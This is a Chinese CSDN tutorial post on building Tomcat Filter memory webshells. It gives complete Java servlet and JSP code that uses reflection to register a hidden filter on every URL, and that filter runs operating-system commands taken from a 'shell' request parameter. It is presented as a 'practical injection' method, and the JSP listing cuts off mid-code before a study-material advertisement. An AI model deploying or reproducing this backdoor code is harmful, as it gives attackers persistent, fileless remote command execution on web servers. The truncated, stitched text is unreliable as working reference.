Java Filter 型内存马调试系列 (二)_applicationfilterconfig

于 2024-05-17 01:46:23 发布
阅读量292 收藏 7
点赞数 4
分类专栏: 程序员 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968940/article/details/138982126
版权

import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Field;

@WebServlet(name = “TomcatServletTest”, urlPatterns = “/tomcatServletTest”)
public class TomcatServletTest extends HttpServlet {
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

}

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    PrintWriter writer = response.getWriter();
    try {
        ServletContext servletContext = request.getServletContext();
        ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
        Class<ApplicationContextFacade> applicationContextFacadeClass = ApplicationContextFacade.class;
        Field applicationContextField = applicationContextFacadeClass.getDeclaredField("context");
        applicationContextField.setAccessible(true);
        Object applicationContextObj = applicationContextField.get(applicationContextFacade);
        ApplicationContext applicationContext = (ApplicationContext) applicationContextObj;
        Class<ApplicationContext> applicationContextClass = ApplicationContext.class;
        Field standardContextField = applicationContextClass.getDeclaredField("context");
        standardContextField.setAccessible(true);
        Object standardContextObj = standardContextField.get(applicationContext);
        writer.append("ServletContext instance's class is: ")
                .append(servletContext.getClass().getCanonicalName())
                .append("\r\n")
                .append("\r\n")
                .append("ApplicationContext instance's class is: ")
                .append(applicationContextObj.getClass().getCanonicalName())
                .append("\r\n")
                .append("\r\n")
                .append("StandardContext instance's class is:")  
                .append(standardContextObj.getClass().getCanonicalName());
    } catch (Exception e) {
        e.printStackTrace(writer);
    }
}

}


![](https://img-blog.csdnimg.cn/e7524d91b7c0460e98e01f157edcb617.png)


###  0x01 通过servlet动态创建一个filter

Servlet0811.java

import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationContextFacade;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.servlet.*;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Scanner;
import java.util.logging.Logger;

@WebServlet(urlPatterns = “/Filter07”)
public class Servlet0811 extends HttpServlet {
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
//反射创建servletContext
ServletContext servletContext = request.getServletContext();
ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
try {
Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField(“context”);
applicationContextFacadeContext.setAccessible(true); //设置在使用构造器的时候不执行权限检查 表示不检测方法是否为public或者private,否则抛出异常 Class Servlet0811 can not access a member of class org.apache.catalina.core.StandardContext with modifiers “private”
//反射创建applicationContext
ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade);
Field applicationContextContext = applicationContext.getClass().getDeclaredField(“context”);
applicationContextContext.setAccessible(true);
//反射创建standardContext
StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext);

        //创建filterConfigs
        Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
        filterConfigs.setAccessible(true);
        HashMap hashMap = (HashMap) filterConfigs.get(standardContext); // 获取所有filters
        String filtername = "Filter";
        if (hashMap.get(filtername) == null) {  // 首次加载没有这个filter
            Filter filter = new Filter() {
                @Override
                public void init(FilterConfig filterConfig) throws ServletException {
                    Logger log = Logger.getLogger("Filter"); //import java.util.logging.Logger;
                    log.info("注入初始化");

                }

                @Override
                public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                    servletRequest.setCharacterEncoding("utf-8");
                    servletResponse.setCharacterEncoding("utf-8");
                    servletResponse.setContentType("text/html;charset=UTF-8");
                    filterChain.doFilter(servletRequest, servletResponse);         // 加这句话为了不影响原程序功能,把filter向后传递


                    HttpServletRequest req = (HttpServletRequest) request;
                    InputStream in = Runtime.getRuntime().exec(req.getParameter("shell")).getInputStream();
                    Scanner s = new Scanner(in).useDelimiter("\\A");
                    String output = s.hasNext() ? s.next() : "";
                    response.getWriter().write(output);
                    Logger log = Logger.getLogger("Filter"); //import java.util.logging.Logger;
                    log.info("过滤中...");
                }

                @Override
                public void destroy() {
                    Logger log = Logger.getLogger("Filter"); //import java.util.logging.Logger;
                    log.info("destroy");
                }
            };

            //构造filterDef对象
            FilterDef filterDef = new FilterDef();
            filterDef.setFilter(filter);
            filterDef.setFilterName(filtername);
            filterDef.setFilterClass(filter.getClass().getName());
            standardContext.addFilterDef(filterDef);

            //构造filterMap对象
            FilterMap filterMap = new FilterMap();
            filterMap.addURLPattern("/*");
            filterMap.setFilterName(filtername);
            filterMap.setDispatcher(DispatcherType.REQUEST.name());
            standardContext.addFilterMapBefore(filterMap);

            //构造filterConfig
            Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
            constructor.setAccessible(true);
            ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef); // 调用 new Filter(){ init(FilterConfig filterConfig) }

            //将filterConfig添加到filterConfigs中,即可完成注入
            hashMap.put(filtername, applicationFilterConfig);
            response.getWriter().println("success");
        }


    } catch (NoSuchFieldException | IllegalAccessException | NoSuchMethodException e) {
        e.printStackTrace();
    } catch (InvocationTargetException e) {
        e.printStackTrace();
    } catch (InstantiationException e) {
        e.printStackTrace();
    }


}

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    this.doPost(request, response);
}

}



首次访问,注入内存马成功:


![](https://img-blog.csdnimg.cn/70d3b1b408a640c6a27a577d81a54454.png)


 继续访问内存马,执行命令:


![](https://img-blog.csdnimg.cn/1a1d0562831e4004a77938d465d64717.png)


如果你感兴趣filter的执行调用顺序, 我在程序里打了断点调试,你可以尝试下断点分析,我的断点截图如下:


![](https://img-blog.csdnimg.cn/ba49e58f9a544ec19d81ec3f5269d9f1.png)


![](https://img-blog.csdnimg.cn/a42bf5c41816492aa12aa2734da6a6e6.png)


![](https://img-blog.csdnimg.cn/fae474bf63ed4ccd977752250c17683e.png)


 


### 0x02 实战注入内存马


实战中不会依赖于xml或注解,通过jsp方式可以实现动态注入一个内存马。


index.jsp

<%@ page import=“java.lang.reflect.Field” %>
<%@ page import=“org.apache.catalina.Context” %>
<%@ page import=“org.apache.tomcat.util.descriptor.web.FilterMap” %>
<%@ page import=“java.lang.reflect.Constructor” %>
<%@ page import=“org.apache.catalina.core.ApplicationFilterConfig” %>
<%@ page import=“org.apache.tomcat.util.descriptor.web.FilterDef” %>
<%@ page import=“org.apache.catalina.core.ApplicationContextFacade” %>
<%@ page import=“org.apache.catalina.core.ApplicationContext” %>
<%@ page import=“org.apache.catalina.core.StandardContext” %>
<%@ page import=“java.util.HashMap” %>
<%@ page import=“java.io.IOException” %>
<%@ page import=“java.util.logging.Logger” %>
<%@ page import=“java.io.InputStream” %>
<%@ page import=“java.util.Scanner” %>
<%
//反射创建servletContext
ServletContext servletContext = request.getServletContext();
ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField(“context”);
applicationContextFacadeContext.setAccessible(true);
//反射创建applicationContext
ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade);
Field applicationContextContext = applicationContext.getClass().getDeclaredField(“context”);
applicationContextContext.setAccessible(true);
//反射创建standardContext
StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext);

//创建filterConfigs
Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
filterConfigs.setAccessible(true);
HashMap hashMap = (HashMap) filterConfigs.get(standardContext);
String filterName = "Filter";
if (hashMap.get(filterName) == null) {


    Filter filter = new Filter() {
        @Override
        public void init(FilterConfig filterConfig) throws ServletException {
            Logger log = Logger.getLogger("Filter");
            log.info("注入初始化");
        }


        @Override
        public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
            servletRequest.setCharacterEncoding("utf-8");
            servletResponse.setCharacterEncoding("utf-8");
            servletResponse.setContentType("text/html;charset=UTF-8");
            filterChain.doFilter(servletRequest, servletResponse);
            HttpServletRequest req = (HttpServletRequest) request;
            // 获取单个命令的返回结果
            InputStream in = Runtime.getRuntime().exec(req.getParameter("shell")).getInputStream();
            Scanner s = new Scanner(in).useDelimiter("\\A");
            String output = s.hasNext() ? s.next() : "";
            response.getWriter().write(output);

            /* 获取多个命令的返回结果   // ?shell=whoami%20%26%20id
            String param=req.getParameter("shell");
            InputStream in = Runtime.getRuntime().exec(new String[]{"sh", "-c",param}).getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(in));
            String line;
            while((line = reader.readLine())!= null){
                response.getWriter().write(line);

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

toEpHDs-1715881574098)]

[外链图片转存中…(img-wgF80tJd-1715881574098)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968940
关注
专栏目录
Java Tomcat内存——filter内存
m0_61506558的博客
11-17 659
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
Tomcat内存学习(一)Filter
Vicl1fe的博客
08-22 363
前言 想研究内存还是得学习这方面的知识。对于Tomcat容器的详解参考:https://blog.csdn.net/sunyunjie361/article/details/58588033 Tomca结构 Tomcat总体结构如下。 Server –> Service –> Connector & Container( Engine –> Host –> Context( Wrapper( Servlet ) ) ) 下面这个图是我对Tomcat的理解。如有错误请指
基于filter内存
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-09 1346
FilterMaps:存放 FilterMap 的数组,在 FilterMap 中主要存放了 FilterName 和 对应的 URLPattern,只要我们将filterFilterDefs,FilterMaps添加到FilterConfigs中就可以添加filter了。又回到之前ApplicationFilterFactory里,这里会返回filterChain这个对象,如果我们直接filterConfig的内容,是不是就能在filterChain调用addFilter时,将filter添加进去。
Java Filter 内存调试系列 ()
leeezp的博客
08-16 34万+
在上一篇文章中简单讲述了新建一个java filter 和 servlet 及 filter 的调用顺序。web容器通过xml配置文件或注解知道这个类是一个过滤器类。那么,如何不使用xml和注解,动态创建并调用内存呢?
Filter内存浅析
angry_program的博客
05-11 2301
1. 何谓内存? 以Tomcat为例,内存主要利用了Tomcat的部分组件会在内存中长期驻留的特性,只要将我们的恶意组件注入其中,就可以一直生效,直到容器重启。 Java内存shell有很多种,大致分为: 1. 动态注册filter 2. 动态注册servlet 3. 动态注册listener 4. 基于Java agent拦截修改关键类字节码实现内存shell 该文主要研究Filter内存的原理和实现。 2. Filter注册流程 假设有一个需要注册的filter类——F.
Java内存学习--Filter内存
zyer
08-04 1012
Filter内存,入门级
Java Filter 内存调试系列 (一)
热门推荐
leeezp的博客
08-12 34万+
网上缺少适合java初学者的优秀的内存调试学习的教程,自己也想把知识做一个提炼总结记录下来,特次打算做一个系列教程。本文是通过实例让大家对内存有一个初步清晰的认知,理解Java Servlet 与 Filter的 使用。.........
java-tomcat-filter内存
12-31 802
java内存
内存分析总结
qq_38618396的博客
04-13 1666
文章目录TomcatTomcat环境搭建Servlet-APIListener内存Filter内存Servlet内存Valve内存字节码增强SpingSpring环境搭建拦截器Controller Tomcat Tomcat环境搭建 Servlet-API Listener内存 Filter内存 Servlet内存 Valve内存 字节码增强 Sping Spring环境搭建 拦截器 Controller ......
深入浅出内存(一)
风炫的博客
07-12 1400
深入浅出内存(一) 0x01 简述 0x0101 Webshell技术历程 在Web安全领域,Webshell一直是一个非常重要且热门的话题。在目前传统安全领域,Webshell根据功能的不同分为三种类,分别是:一句话木,小,大。而根据现在防火墙技术的更新迭代,随后出现了加密的木技术,比如:加密一句话。而我们今天要说的是一种新的无文件的Webshell类内存。 0x0102 为什么会使用内存? 传统Webshell连接方式,都是先通过某种漏洞将恶意的脚本木文件上传,然后通过中国菜刀,或
DirectShow Filter调试方法
skywalker_ll的博客
01-12 1292
DirectShow Filter调试方法关键字 DirectShow Filter Debug原作者姓名 陆其明文章原始出处 http://jemylu.spaces.live.com/ 介绍经常有人会问,我的Filter已经开发好了,但怎么来调试呢?怎么让程序在Filter代码上单步执行呢?其实,这个很容易做到。下面我就来讲一些具体的步骤吧。 正文经常有人会问,我的Filter已经
Java内存学习-Filter
cjdgg的博客
05-03 929
Java内存学习-FliterTomcat架构学习 Tomcat架构学习 Server: Server,即指的WEB服务器,一个Server包括多个Service。 Service: Service的作用是在Connector和Engine外面包了一层(可看上图),把它们组装在一起,对外提供服务。一个Service可以包含多个Connector,但是只能包含一个Engine,其中Connector的作用是从客户端接收请求,Engine的作用是处理接收进来的请求。后面再来细节分析Service。 Conne
tomcat Filter内存
weixin_45682070的博客
02-16 1436
Tomcat Filter 流程分析 首先创建一个javaWeb项目,再把tomcat/lib/catalina.jar和tomcat/lib/servlet-api.jar添加到项目中,创建一个demo文件。如果不会的化可以参考这篇文章 demo package filter; import javax.servlet.*; import java.io.IOException; public class filterDemo implements Filter { public void
Tomcat Filter内存与查杀技术学习
wangluoanquan111的博客
08-04 1121
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
内存初探-Filter
qq_31065143的博客
04-18 1238
内存初探-Filter Tomcat简介 tomcat其实质上就是一个大点的servlet容器,那什么是容器呢,我觉得其实就是一个类。在tomcat中各个容器之间嵌套。而这些容器都是有生命周期的java类,都继承了共同的接口Lifecycle,所以Lifecycle就是这些容器的顶层接口。下面来谈谈存在哪些容器。 容器 init()方法:初始化容器组件,它必须在启动容器之前调用。它会创建许多对象。 start():启动容器,比如启动一个Server。 stop():停止执行 destroy():销毁这个
[JAVA安全]filter 内存
snowlyzz的博客
01-11 581
Filter 内存学习笔记
Tomcat内存学习1:Filter
weixin_43263451的博客
07-20 1201
传统的JSP木特征性强,且需要文件落地,容易被查杀。因此现在出现了内存技术。Java内存又称”无文件”,相较于传统的JSP木,其最大的特点就是无文件落地,存在于内存之中,隐蔽性强。filter内存就是通过动态添加恶意filter组件到正在运行的Tomcat服务器中。导致http请求通过该filter时会执行该filter的恶意代码今天说的时Tomcat内存,其大概分为以下三类FilterServletListener内存利用条件。...
Java内存学习--Filter内存——前置概念
zyer
08-04 310
Filter内存
Filter的注册与调试
SP_daiyq的专栏
08-03 1150
手动注册: 打开命令行提示,进入到相应的filter的目录下 注册: regsvr32 filter.ax 注销: regsvr32 /u filter.ax 自动注册: VC++编译filter的时候可以通过设置实现自动注册,Project --> Set
深度解析Java Filter机制
"Java Filter过滤机制详解" 在Java Web开发中,Filter(过滤器)是一个非常重要的组件,它允许开发者在请求到达目标Servlet之前和离开Servlet之后进行预处理和后处理。这个机制是自Servlet 2.3版本起引入的,极大地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值